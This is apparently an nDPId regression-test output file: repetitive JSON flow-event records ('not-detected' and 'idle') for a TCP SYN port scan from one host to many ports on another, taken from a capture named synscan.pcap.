-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058656,"flow_last_seen":1278275058656,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6839,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058656,"flow_last_seen":1278275058656,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6839,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8888,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8888,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8888,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8888,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":700,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":700,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":305,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":700,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":305,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":700,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":950,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":705,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":950,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":705,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1005,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":705,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1005,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":705,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8899,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8899,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1284,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8899,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1284,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8899,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060355,"flow_last_seen":1278275060355,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":711,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060355,"flow_last_seen":1278275060355,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":711,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1301,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060456,"flow_last_seen":1278275060456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":711,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1301,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060456,"flow_last_seen":1278275060456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":711,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":714,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":714,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":714,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":714,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1382,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":720,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1382,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1467,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":720,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1467,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1342,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":722,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1342,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":722,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1403,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":722,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1403,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":722,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":457,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":726,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":457,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":726,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":491,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":726,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":491,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":726,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1439,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27352,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1439,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27352,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1801,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27353,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1801,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27353,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1507,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27352,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1507,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27352,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1856,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27353,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1856,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27353,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27355,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 